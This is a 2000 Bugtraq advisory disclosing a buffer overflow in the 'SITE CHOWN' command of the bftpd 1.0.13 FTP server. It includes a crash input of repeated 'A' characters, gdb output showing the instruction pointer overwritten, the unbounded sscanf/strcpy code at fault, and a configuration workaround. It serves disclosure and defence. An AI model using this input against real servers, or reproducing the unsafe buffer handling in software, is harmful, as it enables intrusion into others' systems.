Date:         Wed, 13 Dec 2000 20:13:25 +0100
From: BAILLEUX Christophe <cb@GROLIER.FR>
Subject:      Potential Buffer Overflow vulnerability in bftpd-1.0.13
To: BUGTRAQ@SECURITYFOCUS.COM

There is a potential buffer overflow vulnerability in the command "SITE
CHOWN"


230 User logged in.
site chown AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAA A
550 User 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' not found.
Connection closed by foreign host.



gdb /usr/sbin/bftpd 18214
.............
Loaded symbols for /lib/libnss_compat.so.2
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1
0x400e7514 in read () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $esp
0xbffffc68:     0x41414141
(gdb)



The problem is in the command_chown function in commands.c :

465  void command_chown(char *params) {
466    char foo[USERLEN + 1], owner[USERLEN + 1], group[USERLEN + 1], filename[256];
467    int uid, gid;
468    if(!strstr(params, " ")) {
469      fprintf(stderr, "550 Usage: SITE CHOWN <owner>[.<group>] <filename>\r\n");
470      return;
471    }
472    sscanf(params, "%[^ ] %s", foo, filename);
473    if(strstr(foo, "."))
474      sscanf(foo, "%[^.].%s", owner, group);
475    else {
476      strcpy(owner, foo);
477      group[0] = '\0';
478    }
479    if(!sscanf(owner, "%i", &uid)) /* Is it a number? */
480      if(((uid = mygetpwnam(owner, passwdfile))) < 0) {
481        fprintf(stderr, "550 User '%s' not found.\r\n", owner);
482        return;
483      }


Workaround :

Replace in /etc/bftpd.conf

  ENABLE_SITE=yes

by

  ENABLE_SITE=no


Best regards,

--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr